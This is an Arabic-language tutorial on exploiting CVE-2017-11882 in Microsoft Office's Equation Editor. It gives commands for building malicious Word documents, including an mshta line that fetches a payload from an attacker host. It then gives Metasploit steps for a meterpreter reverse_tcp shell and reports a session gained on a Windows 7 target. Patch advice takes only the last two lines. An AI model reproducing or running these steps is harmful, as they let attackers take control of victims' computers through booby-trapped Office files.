
CVE-2017-11882(قتل شامل لـ Office من 2003 إلى 2016)
من حيث تأثير الاستغلال، يمكنه اختراق جميع إصدارات Office من 2003 إلى 2016، وبناء بيئة الهجوم بسيط للغاية. ينجم هذه الثغرة عن [محرر المعادلات] داخل برنامج Office، حيث لا يتحقق عملية المحرر من طول الاسم، مما يؤدي إلى تجاوز سعة المخزن المؤقت، ويمكن للمهاجم تنفيذ تعليمات برمجية عشوائية عن طريق إنشاء أحرف خاصة. على سبيل المثال، إذا استغل المخترق هذه الثغرة لإنشاء ملف Office يحتوي على باب خلفي للشيل، فعندما يفتح مستخدم عادي ملف Office هذا، يمكن للمخترق السيطرة على الكمبيوتر مباشرة.
office 2003
office 2007
office 2010
office 2013
office 2016
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

عند النقر على ”test.doc” الذي تم إنشاؤه، يتم فتح أداة الآلة الحاسبة بنجاح.
python Command_CVE-2017-11882.py -c "mshta http://192.168.43.165:8080/11882" -o 11882-3.doc


تم إنشاء ملف Word 11882-3.doc بنجاح.
ضع ملف cve_2017_11882.rb في الدليل /usr/share/metasploit-framework/modules/exploits/windows/smb:
msf > search CVE-2017-11882
msf > use exploit/windows/smb/CVE-2017-11882
msf exploit(CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp
msf exploit(CVE-2017-11882) > set lhost 192.168.43.165
msf exploit(CVE-2017-11882) > set uripath 11882
msf exploit(CVE-2017-11882) > exploit
بدء حالة الاستماع:

عند النقر على ملف 11882-3.doc في جهاز الهدف Win7، تم الحصول على الجلسات بنجاح!

① التحديث عبر الإنترنت: قم بتشغيل تحديث Windows Update، وهذه الطريقة كافية لمعظم الأشخاص.
② تثبيت التصحيح: عنوان تصحيح Microsoft لهذه الثغرة: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882